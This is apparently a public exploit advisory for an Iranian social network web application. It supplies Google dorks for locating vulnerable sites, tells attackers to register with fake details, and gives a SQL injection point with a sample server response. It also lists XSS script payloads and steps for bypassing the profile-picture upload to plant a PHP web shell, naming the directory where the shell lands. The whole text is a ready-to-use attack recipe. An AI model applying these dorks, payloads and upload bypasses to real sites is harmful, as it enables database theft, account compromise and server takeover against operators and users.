########################################################## # Title : Iranian Social Network Multiple Exploit # Date : 12 April 2018 # Tested on : Ubuntu/Windows 10 # Google Dork : inurl:/register.php intitle:شبکه اجتماعی # Google Dork2 : inurl:/news2.php?id= intitle:شبکه اجتماعی # Author : GIST # Vendor : http://sana-net.com/ # Exploit Type : Remote # Version : All Version # CVE : - ########################################################### Description : Iranian Social Network Have Multiple Vulnerablity (Sqli , Xss , File Upload). We can inject and download database or upload shell. For using this vulnerabilities first you have to register with fake information then you can use the vulnerabilities Sql Injection : Url : site.com/search_prof.php?op=3&ostan=1219&vez=1219&sen1=1219&jensu=1219&city=1219&picu=1219&vsalamat=1219' Request Method : Post -- response -- HTTP/1.1 200OK Server nginx/1.4.6 (Ubuntu) Date: Thu, 10 mar 2016 19:18:47 GMT Content-Type: text/html Transfer-Encoding: Chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.5.9-1ubuntu4.14 Expires: Thu, 19 Nov 1981 08:51:00 GMT Cache-Control: no=store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragme: no-cache Content-encoing: gzip Xss : URL : site.com/search_prof.php?op=3&ostan=1219&vez=1219&sen1=1219&jensu=1219&city=1219&picu=1219&vsalamat=1219 commands : <script>alert('Xss')</script> or "><script>alert('Xss')</script> File Upload : URL : /editprofilepic.php Method : Post Convert .php to .jpg and choose your shell and bypass file to .php with live http header. Directory Shell : site.com/images/users/shell.php